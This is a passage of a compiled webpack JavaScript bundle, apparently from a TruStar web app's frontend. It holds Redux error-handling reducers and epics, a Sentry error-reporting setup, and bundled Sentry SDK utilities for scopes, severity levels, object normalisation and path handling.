//       };
//     } else {
//       return {
//         type: 'FETCH_ALL_ENTITY_SCORES_SUCCESS'
//       };
//     }
//   });

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_4_redux_observable__["combineEpics"])(fetchScoresPageEpic
// fetchNextScoresPageEpic
));

/***/ }),
/* 3207 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "hasError", function() { return hasError; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "errors", function() { return errors; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "info", function() { return info; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);


var hasError = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['errors', 'hasError']);
var errors = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['errors', 'errors']);
var info = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['errors', 'info']);

/***/ }),
/* 3208 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "throwGlobalError", function() { return throwGlobalError; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "catchGlobalError", function() { return catchGlobalError; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__action_types__ = __webpack_require__(768);


var throwGlobalError = function throwGlobalError(error) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types__["c" /* GLOBAL_ERROR_THROW */],
    payload: error
  };
};

var catchGlobalError = function catchGlobalError(error) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types__["b" /* GLOBAL_ERROR_CAUGHT */],
    payload: error
  };
};

/***/ }),
/* 3209 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export hasError */
/* unused harmony export error */
/* unused harmony export info */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__action_types__ = __webpack_require__(768);





var debug = __WEBPACK_IMPORTED_MODULE_2_debug___default()('app:modules:errors:stores'); // eslint-disable-line no-unused-vars



var hasError = function hasError() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types__["c" /* GLOBAL_ERROR_THROW */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_3__action_types__["b" /* GLOBAL_ERROR_CAUGHT */]:
      return false;
    default:
      return state;
  }
};

var error = function error() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])();
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types__["a" /* GLOBAL_ERROR_ACKNOWLEDGED */]:
      return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])();
    case __WEBPACK_IMPORTED_MODULE_3__action_types__["c" /* GLOBAL_ERROR_THROW */]:
      return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])(action.payload.error);
    default:
      return state;
  }
};

var info = function info() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])();
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types__["a" /* GLOBAL_ERROR_ACKNOWLEDGED */]:
      return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])();
    case __WEBPACK_IMPORTED_MODULE_3__action_types__["c" /* GLOBAL_ERROR_THROW */]:
      return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])(action.payload.info);
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  hasError: hasError,
  error: error,
  info: info
}));

/***/ }),
/* 3210 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__sentry_browser__ = __webpack_require__(3211);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_modules_profile_action_types__ = __webpack_require__(116);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__action_types__ = __webpack_require__(768);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_react_router_redux__ = __webpack_require__(100);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_react_router_redux___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_react_router_redux__);






var debug = __WEBPACK_IMPORTED_MODULE_1_debug___default()('modules:errors');

if (true) {
  __WEBPACK_IMPORTED_MODULE_2__sentry_browser__["b" /* init */]({
    dsn: 'https://5e89b286bf4743469c578b7812477d5f@o378897.ingest.sentry.io/6157663',
    release: "v5.2.3-23-gdec5e66",
    environment: "production" || 'development',
    maxBreadcrumbs: 5
  });
}

var profileTrackingEpic = function profileTrackingEpic(action$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_3_modules_profile_action_types__["f" /* FETCH_SUCCESS */]).filter(function () {
    return true;
  }).do(function (_ref) {
    var payload = _ref.payload;

    debug('Initializing Sentry user:', payload);
    try {
      var trackedUser = {
        id: payload.guid,
        isTrialCompany: payload.company.trialCompany,
        enclaveInboxLimit: payload.company.maxIngestEmailsCount,
        firstVisitDate: payload.activationDate
      };
      __WEBPACK_IMPORTED_MODULE_2__sentry_browser__["a" /* configureScope */](function (scope) {
        scope.setUser(trackedUser);
      });

      debug('Initialized user', trackedUser);
    } catch (err) {
      debug('Sentry user could not be initialized. Adblocker?', payload, err);
    }
  }).ignoreElements();
};

var handleGlobalError = function handleGlobalError(action$, store) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_4__action_types__["c" /* GLOBAL_ERROR_THROW */]).mapTo(__WEBPACK_IMPORTED_MODULE_5_react_router_redux__["push"]('/error'));
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_observable__["combineEpics"])(profileTrackingEpic, handleGlobalError));

/***/ }),
/* 3211 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export Integrations */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_tslib__ = __webpack_require__(64);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__sentry_types__ = __webpack_require__(285);
/* unused harmony reexport Severity */
/* unused harmony reexport Status */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__sentry_core__ = __webpack_require__(136);
/* unused harmony reexport addGlobalEventProcessor */
/* unused harmony reexport addBreadcrumb */
/* unused harmony reexport captureException */
/* unused harmony reexport captureEvent */
/* unused harmony reexport captureMessage */
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return __WEBPACK_IMPORTED_MODULE_2__sentry_core__["g"]; });
/* unused harmony reexport getHubFromCarrier */
/* unused harmony reexport getCurrentHub */
/* unused harmony reexport Hub */
/* unused harmony reexport Scope */
/* unused harmony reexport setContext */
/* unused harmony reexport setExtra */
/* unused harmony reexport setExtras */
/* unused harmony reexport setTag */
/* unused harmony reexport setTags */
/* unused harmony reexport setUser */
/* unused harmony reexport Span */
/* unused harmony reexport withScope */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__client__ = __webpack_require__(1426);
/* unused harmony reexport BrowserClient */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__sdk__ = __webpack_require__(3236);
/* unused harmony reexport defaultIntegrations */
/* unused harmony reexport forceLoad */
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return __WEBPACK_IMPORTED_MODULE_4__sdk__["a"]; });
/* unused harmony reexport lastEventId */
/* unused harmony reexport onLoad */
/* unused harmony reexport showReportDialog */
/* unused harmony reexport flush */
/* unused harmony reexport close */
/* unused harmony reexport wrap */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__version__ = __webpack_require__(1428);
/* unused harmony reexport SDK_NAME */
/* unused harmony reexport SDK_VERSION */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__sentry_utils__ = __webpack_require__(53);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__integrations__ = __webpack_require__(1429);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__transports__ = __webpack_require__(1427);
/* unused harmony reexport Transports */










var windowIntegrations = {};
// This block is needed to add compatibility with the integrations packages when used with a CDN
// tslint:disable: no-unsafe-any
var _window = Object(__WEBPACK_IMPORTED_MODULE_6__sentry_utils__["i" /* getGlobalObject */])();
if (_window.Sentry && _window.Sentry.Integrations) {
    windowIntegrations = _window.Sentry.Integrations;
}
// tslint:enable: no-unsafe-any
var INTEGRATIONS = __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({}, windowIntegrations, __WEBPACK_IMPORTED_MODULE_2__sentry_core__["d" /* Integrations */], __WEBPACK_IMPORTED_MODULE_7__integrations__);

//# sourceMappingURL=index.js.map

/***/ }),
/* 3212 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export LogLevel */
/** Console logging verbosity for the SDK. */
var LogLevel;
(function (LogLevel) {
    /** No logs will be generated. */
    LogLevel[LogLevel["None"] = 0] = "None";
    /** Only SDK internal errors will be logged. */
    LogLevel[LogLevel["Error"] = 1] = "Error";
    /** Information useful for debugging the SDK will be logged. */
    LogLevel[LogLevel["Debug"] = 2] = "Debug";
    /** All SDK actions will be logged. */
    LogLevel[LogLevel["Verbose"] = 3] = "Verbose";
})(LogLevel || (LogLevel = {}));
//# sourceMappingURL=loglevel.js.map

/***/ }),
/* 3213 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Severity; });
/** JSDoc */
var Severity;
(function (Severity) {
    /** JSDoc */
    Severity["Fatal"] = "fatal";
    /** JSDoc */
    Severity["Error"] = "error";
    /** JSDoc */
    Severity["Warning"] = "warning";
    /** JSDoc */
    Severity["Log"] = "log";
    /** JSDoc */
    Severity["Info"] = "info";
    /** JSDoc */
    Severity["Debug"] = "debug";
    /** JSDoc */
    Severity["Critical"] = "critical";
})(Severity || (Severity = {}));
// tslint:disable:completed-docs
// tslint:disable:no-unnecessary-qualifier no-namespace
(function (Severity) {
    /**
     * Converts a string-based level into a {@link Severity}.
     *
     * @param level string representation of Severity
     * @returns Severity
     */
    function fromString(level) {
        switch (level) {
            case 'debug':
                return Severity.Debug;
            case 'info':
                return Severity.Info;
            case 'warn':
            case 'warning':
                return Severity.Warning;
            case 'error':
                return Severity.Error;
            case 'fatal':
                return Severity.Fatal;
            case 'critical':
                return Severity.Critical;
            case 'log':
            default:
                return Severity.Log;
        }
    }
    Severity.fromString = fromString;
})(Severity || (Severity = {}));
//# sourceMappingURL=severity.js.map

/***/ }),
/* 3214 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Status; });
/** The status of an event. */
var Status;
(function (Status) {
    /** The status could not be determined. */
    Status["Unknown"] = "unknown";
    /** The event was skipped due to configuration or callbacks. */
    Status["Skipped"] = "skipped";
    /** The event was sent to Sentry successfully. */
    Status["Success"] = "success";
    /** The client is currently rate limited and will try again later. */
    Status["RateLimit"] = "rate_limit";
    /** The event could not be processed. */
    Status["Invalid"] = "invalid";
    /** A server-side error ocurred during submission. */
    Status["Failed"] = "failed";
})(Status || (Status = {}));
// tslint:disable:completed-docs
// tslint:disable:no-unnecessary-qualifier no-namespace
(function (Status) {
    /**
     * Converts a HTTP status code into a {@link Status}.
     *
     * @param code The HTTP response status code.
     * @returns The send status or {@link Status.Unknown}.
     */
    function fromHttpCode(code) {
        if (code >= 200 && code < 300) {
            return Status.Success;
        }
        if (code === 429) {
            return Status.RateLimit;
        }
        if (code >= 400 && code < 500) {
            return Status.Invalid;
        }
        if (code >= 500) {
            return Status.Failed;
        }
        return Status.Unknown;
    }
    Status.fromHttpCode = fromHttpCode;
})(Status || (Status = {}));
//# sourceMappingURL=status.js.map

/***/ }),
/* 3215 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = captureException;
/* unused harmony export captureMessage */
/* unused harmony export captureEvent */
/* harmony export (immutable) */ __webpack_exports__["b"] = configureScope;
/* unused harmony export addBreadcrumb */
/* unused harmony export setContext */
/* unused harmony export setExtras */
/* unused harmony export setTags */
/* unused harmony export setExtra */
/* unused harmony export setTag */
/* unused harmony export setUser */
/* harmony export (immutable) */ __webpack_exports__["c"] = withScope;
/* unused harmony export _callOnClient */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_tslib__ = __webpack_require__(64);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__sentry_hub__ = __webpack_require__(374);


/**
 * This calls a function on the current hub.
 * @param method function to call on hub.
 * @param args to pass to function.
 */
function callOnHub(method) {
    var args = [];
    for (var _i = 1; _i < arguments.length; _i++) {
        args[_i - 1] = arguments[_i];
    }
    var hub = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_hub__["b" /* getCurrentHub */])();
    if (hub && hub[method]) {
        // tslint:disable-next-line:no-unsafe-any
        return hub[method].apply(hub, __WEBPACK_IMPORTED_MODULE_0_tslib__["f" /* __spread */](args));
    }
    throw new Error("No hub defined or " + method + " was not found on the hub, please open a bug report.");
}
/**
 * Captures an exception event and sends it to Sentry.
 *
 * @param exception An exception-like object.
 * @returns The generated eventId.
 */
function captureException(exception) {
    var syntheticException;
    try {
        throw new Error('Sentry syntheticException');
    }
    catch (exception) {
        syntheticException = exception;
    }
    return callOnHub('captureException', exception, {
        originalException: exception,
        syntheticException: syntheticException,
    });
}
/**
 * Captures a message event and sends it to Sentry.
 *
 * @param message The message to send to Sentry.
 * @param level Define the level of the message.
 * @returns The generated eventId.
 */
function captureMessage(message, level) {
    var syntheticException;
    try {
        throw new Error(message);
    }
    catch (exception) {
        syntheticException = exception;
    }
    return callOnHub('captureMessage', message, level, {
        originalException: message,
        syntheticException: syntheticException,
    });
}
/**
 * Captures a manually created event and sends it to Sentry.
 *
 * @param event The event to send to Sentry.
 * @returns The generated eventId.
 */
function captureEvent(event) {
    return callOnHub('captureEvent', event);
}
/**
 * Callback to set context information onto the scope.
 * @param callback Callback function that receives Scope.
 */
function configureScope(callback) {
    callOnHub('configureScope', callback);
}
/**
 * Records a new breadcrumb which will be attached to future events.
 *
 * Breadcrumbs will be added to subsequent events to provide more context on
 * user's actions prior to an error or crash.
 *
 * @param breadcrumb The breadcrumb to record.
 */
function addBreadcrumb(breadcrumb) {
    callOnHub('addBreadcrumb', breadcrumb);
}
/**
 * Sets context data with the given name.
 * @param name of the context
 * @param context Any kind of data. This data will be normailzed.
 */
function setContext(name, context) {
    callOnHub('setContext', name, context);
}
/**
 * Set an object that will be merged sent as extra data with the event.
 * @param extras Extras object to merge into current context.
 */
function setExtras(extras) {
    callOnHub('setExtras', extras);
}
/**
 * Set an object that will be merged sent as tags data with the event.
 * @param tags Tags context object to merge into current context.
 */
function setTags(tags) {
    callOnHub('setTags', tags);
}
/**
 * Set key:value that will be sent as extra data with the event.
 * @param key String of extra
 * @param extra Any kind of data. This data will be normailzed.
 */
function setExtra(key, extra) {
    callOnHub('setExtra', key, extra);
}
/**
 * Set key:value that will be sent as tags data with the event.
 * @param key String key of tag
 * @param value String value of tag
 */
function setTag(key, value) {
    callOnHub('setTag', key, value);
}
/**
 * Updates user context information for future events.
 *
 * @param user User context object to be set in the current context. Pass `null` to unset the user.
 */
function setUser(user) {
    callOnHub('setUser', user);
}
/**
 * Creates a new scope with and executes the given operation within.
 * The scope is automatically removed once the operation
 * finishes or throws.
 *
 * This is essentially a convenience function for:
 *
 *     pushScope();
 *     callback();
 *     popScope();
 *
 * @param callback that will be enclosed into push/popScope.
 */
function withScope(callback) {
    callOnHub('withScope', callback);
}
/**
 * Calls a function on the latest client. Use this with caution, it's meant as
 * in "internal" helper so we don't need to expose every possible function in
 * the shim. It is not guaranteed that the client actually implements the
 * function.
 *
 * @param method The method to call on the client/client.
 * @param args Arguments to pass to the client/fontend.
 */
function _callOnClient(method) {
    var args = [];
    for (var _i = 1; _i < arguments.length; _i++) {
        args[_i - 1] = arguments[_i];
    }
    callOnHub.apply(void 0, __WEBPACK_IMPORTED_MODULE_0_tslib__["f" /* __spread */](['_invokeClient', method], args));
}
//# sourceMappingURL=index.js.map

/***/ }),
/* 3216 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export forget */
/* unused harmony export filterAsync */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_tslib__ = __webpack_require__(64);

/**
 * Consumes the promise and logs the error when it rejects.
 * @param promise A promise to forget.
 */
function forget(promise) {
    promise.catch(function (e) {
        // TODO: Use a better logging mechanism
        console.error(e);
    });
}
/**
 * Helper to filter an array with asynchronous callbacks.
 *
 * @param array An array containing items to filter.
 * @param predicate An async predicate evaluated on every item.
 * @param thisArg Optional value passed as "this" into the callback.
 * @returns An array containing only values where the callback returned true.
 */
function filterAsync(array, predicate, thisArg) {
    return __WEBPACK_IMPORTED_MODULE_0_tslib__["b" /* __awaiter */](this, void 0, void 0, function () {
        var verdicts;
        return __WEBPACK_IMPORTED_MODULE_0_tslib__["d" /* __generator */](this, function (_a) {
            switch (_a.label) {
                case 0: return [4 /*yield*/, Promise.all(array.map(predicate, thisArg))];
                case 1:
                    verdicts = _a.sent();
                    return [2 /*return*/, array.filter(function (_, index) { return verdicts[index]; })];
            }
        });
    });
}
//# sourceMappingURL=async.js.map

/***/ }),
/* 3217 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return setPrototypeOf; });
var setPrototypeOf = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array ? setProtoOf : mixinProperties); // tslint:disable-line:no-unbound-method
/**
 * setPrototypeOf polyfill using __proto__
 */
function setProtoOf(obj, proto) {
    // @ts-ignore
    obj.__proto__ = proto;
    return obj;
}
/**
 * setPrototypeOf polyfill using mixin
 */
function mixinProperties(obj, proto) {
    for (var prop in proto) {
        if (!obj.hasOwnProperty(prop)) {
            // @ts-ignore
            obj[prop] = proto[prop];
        }
    }
    return obj;
}
//# sourceMappingURL=polyfill.js.map

/***/ }),
/* 3218 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* WEBPACK VAR INJECTION */(function(global) {/* harmony export (immutable) */ __webpack_exports__["a"] = fill;
/* harmony export (immutable) */ __webpack_exports__["d"] = urlEncode;
/* harmony export (immutable) */ __webpack_exports__["c"] = normalizeToSize;
/* unused harmony export walk */
/* harmony export (immutable) */ __webpack_exports__["b"] = normalize;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__is__ = __webpack_require__(514);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__memo__ = __webpack_require__(1423);


/**
 * Wrap a given object method with a higher-order function
 *
 * @param source An object that contains a method to be wrapped.
 * @param name A name of method to be wrapped.
 * @param replacement A function that should be used to wrap a given method.
 * @returns void
 */
function fill(source, name, replacement) {
    if (!(name in source)) {
        return;
    }
    var original = source[name];
    var wrapped = replacement(original);
    // Make sure it's a function first, as we need to attach an empty prototype for `defineProperties` to work
    // otherwise it'll throw "TypeError: Object.defineProperties called on non-object"
    // tslint:disable-next-line:strict-type-predicates
    if (typeof wrapped === 'function') {
        try {
            wrapped.prototype = wrapped.prototype || {};
            Object.defineProperties(wrapped, {
                __sentry__: {
                    enumerable: false,
                    value: true,
                },
                __sentry_original__: {
                    enumerable: false,
                    value: original,
                },
                __sentry_wrapped__: {
                    enumerable: false,
                    value: wrapped,
                },
            });
        }
        catch (_Oo) {
            // This can throw if multiple fill happens on a global object like XMLHttpRequest
            // Fixes https://github.com/getsentry/sentry-javascript/issues/2043
        }
    }
    source[name] = wrapped;
}
/**
 * Encodes given object into url-friendly format
 *
 * @param object An object that contains serializable values
 * @returns string Encoded
 */
function urlEncode(object) {
    return Object.keys(object)
        .map(
    // tslint:disable-next-line:no-unsafe-any
    function (key) { return encodeURIComponent(key) + "=" + encodeURIComponent(object[key]); })
        .join('&');
}
/**
 * Transforms Error object into an object literal with all it's attributes
 * attached to it.
 *
 * Based on: https://github.com/ftlabs/js-abbreviate/blob/fa709e5f139e7770a71827b1893f22418097fbda/index.js#L95-L106
 *
 * @param error An Error containing all relevant information
 * @returns An object with all error properties
 */
function objectifyError(error) {
    // These properties are implemented as magical getters and don't show up in `for-in` loop
    var err = {
        message: error.message,
        name: error.name,
        stack: error.stack,
    };
    for (var i in error) {
        if (Object.prototype.hasOwnProperty.call(error, i)) {
            err[i] = error[i];
        }
    }
    return err;
}
/** Calculates bytes size of input string */
function utf8Length(value) {
    // tslint:disable-next-line:no-bitwise
    return ~-encodeURI(value).split(/%..|./).length;
}
/** Calculates bytes size of input object */
function jsonSize(value) {
    return utf8Length(JSON.stringify(value));
}
/** JSDoc */
function normalizeToSize(object, 
// Default Node.js REPL depth
depth, 
// 100kB, as 200kB is max payload size, so half sounds reasonable
maxSize) {
    if (depth === void 0) { depth = 3; }
    if (maxSize === void 0) { maxSize = 100 * 1024; }
    var serialized = normalize(object, depth);
    if (jsonSize(serialized) > maxSize) {
        return normalizeToSize(object, depth - 1, maxSize);
    }
    return serialized;
}
/** Transforms any input value into a string form, either primitive value or a type of the input */
function serializeValue(value) {
    var type = Object.prototype.toString.call(value);
    // Node.js REPL notation
    if (typeof value === 'string') {
        return value;
    }
    if (type === '[object Object]') {
        return '[Object]';
    }
    if (type === '[object Array]') {
        return '[Array]';
    }
    var normalized = normalizeValue(value);
    return Object(__WEBPACK_IMPORTED_MODULE_0__is__["f" /* isPrimitive */])(normalized) ? normalized : type;
}
/**
 * normalizeValue()
 *
 * Takes unserializable input and make it serializable friendly
 *
 * - translates undefined/NaN values to "[undefined]"/"[NaN]" respectively,
 * - serializes Error objects
 * - filter global objects
 */
function normalizeValue(value, key) {
    if (key === 'domain' && typeof value === 'object' && value._events) {
        return '[Domain]';
    }
    if (key === 'domainEmitter') {
        return '[DomainEmitter]';
    }
    if (typeof global !== 'undefined' && value === global) {
        return '[Global]';
    }
    if (typeof window !== 'undefined' && value === window) {
        return '[Window]';
    }
    if (typeof document !== 'undefined' && value === document) {
        return '[Document]';
    }
    // tslint:disable-next-line:strict-type-predicates
    if (typeof Event !== 'undefined' && value instanceof Event) {
        return Object.getPrototypeOf(value) ? value.constructor.name : 'Event';
    }
    // React's SyntheticEvent thingy
    if (Object(__WEBPACK_IMPORTED_MODULE_0__is__["i" /* isSyntheticEvent */])(value)) {
        return '[SyntheticEvent]';
    }
    if (Number.isNaN(value)) {
        return '[NaN]';
    }
    if (value === void 0) {
        return '[undefined]';
    }
    if (typeof value === 'function') {
        return "[Function: " + (value.name || '<unknown-function-name>') + "]";
    }
    return value;
}
/**
 * Walks an object to perform a normalization on it
 *
 * @param key of object that's walked in current iteration
 * @param value object to be walked
 * @param depth Optional number indicating how deep should walking be performed
 * @param memo Optional Memo class handling decycling
 */
function walk(key, value, depth, memo) {
    if (depth === void 0) { depth = +Infinity; }
    if (memo === void 0) { memo = new __WEBPACK_IMPORTED_MODULE_1__memo__["a" /* Memo */](); }
    // If we reach the maximum depth, serialize whatever has left
    if (depth === 0) {
        return serializeValue(value);
    }
    // If value implements `toJSON` method, call it and return early
    // tslint:disable:no-unsafe-any
    if (value !== null && value !== undefined && typeof value.toJSON === 'function') {
        return value.toJSON();
    }
    // tslint:enable:no-unsafe-any
    // If normalized value is a primitive, there are no branches left to walk, so we can just bail out, as theres no point in going down that branch any further
    var normalized = normalizeValue(value, key);
    if (Object(__WEBPACK_IMPORTED_MODULE_0__is__["f" /* isPrimitive */])(normalized)) {
        return normalized;
    }
    // Create source that we will use for next itterations, either objectified error object (Error type with extracted keys:value pairs) or the input itself
    var source = (Object(__WEBPACK_IMPORTED_MODULE_0__is__["c" /* isError */])(value) ? objectifyError(value) : value);
    // Create an accumulator that will act as a parent for all future itterations of that branch
    var acc = Array.isArray(value) ? [] : {};
    // If we already walked that branch, bail out, as it's circular reference
    if (memo.memoize(value)) {
        return '[Circular ~]';
    }
    // Walk all keys of the source
    for (var innerKey in source) {
        // Avoid iterating over fields in the prototype if they've somehow been exposed to enumeration.
        if (!Object.prototype.hasOwnProperty.call(source, innerKey)) {
            continue;
        }
        // Recursively walk through all the child nodes
        acc[innerKey] = walk(innerKey, source[innerKey], depth - 1, memo);
    }
    // Once walked through all the branches, remove the parent from memo storage
    memo.unmemoize(value);
    // Return accumulated values
    return acc;
}
/**
 * normalize()
 *
 * - Creates a copy to prevent original input mutation
 * - Skip non-enumerablers
 * - Calls `toJSON` if implemented
 * - Removes circular references
 * - Translates non-serializeable values (undefined/NaN/Functions) to serializable format
 * - Translates known global objects/Classes to a string representations
 * - Takes care of Error objects serialization
 * - Optionally limit depth of final output
 */
function normalize(input, depth) {
    try {
        // tslint:disable-next-line:no-unsafe-any
        return JSON.parse(JSON.stringify(input, function (key, value) { return walk(key, value, depth); }));
    }
    catch (_oO) {
        return '**non-serializable**';
    }
}
//# sourceMappingURL=object.js.map
/* WEBPACK VAR INJECTION */}.call(__webpack_exports__, __webpack_require__(17)))

/***/ }),
/* 3219 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export resolve */
/* unused harmony export relative */
/* unused harmony export normalizePath */
/* unused harmony export isAbsolute */
/* unused harmony export join */
/* unused harmony export dirname */
/* unused harmony export basename */
// Slightly modified (no IE8 support, ES6) and transcribed to TypeScript
// https://raw.githubusercontent.com/calvinmetcalf/rollup-plugin-node-builtins/master/src/es6/path.js
/** JSDoc */
function normalizeArray(parts, allowAboveRoot) {
    // if the path tries to go above the root, `up` ends up > 0
    var up = 0;
    for (var i = parts.length - 1; i >= 0; i--) {
        var last = parts[i];
        if (last === '.') {
            parts.splice(i, 1);
        }
        else if (last === '..') {
            parts.splice(i, 1);
            up++;
        }
        else if (up) {
            parts.splice(i, 1);
            up--;
        }
    }
    // if the path is allowed to go above the root, restore leading ..s
    if (allowAboveRoot) {
        for (; up--; up) {
            parts.unshift('..');
        }
    }
    return parts;
}
// Split a filename into [root, dir, basename, ext], unix version
// 'root' is just a slash, or nothing.
var splitPathRe = /^(\/?|)([\s\S]*?)((?:\.{1,2}|[^\/]+?|)(\.[^.\/]*|))(?:[\/]*)$/;
/** JSDoc */
function splitPath(filename) {
    var parts = splitPathRe.exec(filename);
    return parts ? parts.slice(1) : [];
}
// path.resolve([from ...], to)
// posix version
/** JSDoc */
function resolve() {
    var args = [];
    for (var _i = 0; _i < arguments.length; _i++) {
        args[_i] = arguments[_i];
    }
    var resolvedPath = '';
    var resolvedAbsolute = false;
    for (var i = args.length - 1; i >= -1 && !resolvedAbsolute; i--) {
        var path = i >= 0 ? args[i] : '/';
        // Skip empty entries
        if (!path) {
            continue;
        }
        resolvedPath = path + "/" + resolvedPath;
        resolvedAbsolute = path.charAt(0) === '/';
    }
    // At this point the path should be resolved to a full absolute path, but
    // handle relative paths to be safe (might happen when process.cwd() fails)
    // Normalize the path
    resolvedPath = normalizeArray(resolvedPath.split('/').filter(function (p) { return !!p; }), !resolvedAbsolute).join('/');
    return (resolvedAbsolute ? '/' : '') + resolvedPath || '.';
}
/** JSDoc */
function trim(arr) {
    var start = 0;
    for (; start < arr.length; start++) {
        if (arr[start] !== '') {
            break;
        }
    }
    var end = arr.length - 1;
    for (; end >= 0; end--) {
        if (arr[end] !== '') {
            break;
        }
    }
    if (start > end) {
        return [];
    }
    return arr.slice(start, end - start + 1);
}
// path.relative(from, to)
// posix version
/** JSDoc */
function relative(from, to) {
    // tslint:disable:no-parameter-reassignment
    from = resolve(from).substr(1);
    to = resolve(to).substr(1);
    var fromParts = trim(from.split('/'));
    var toParts = trim(to.split('/'));
    var length = Math.min(fromParts.length, toParts.length);
    var samePartsLength = length;
    for (var i = 0; i < length; i++) {
        if (fromParts[i] !== toParts[i]) {
            samePartsLength = i;
            break;
        }
    }
    var outputParts = [];
    for (var i = samePartsLength; i < fromParts.length; i++) {
        outputParts.push('..');
    }
    outputParts = outputParts.concat(toParts.slice(samePartsLength));
    return outputParts.join('/');
}
// path.normalize(path)
// posix version
/** JSDoc */
function normalizePath(path) {
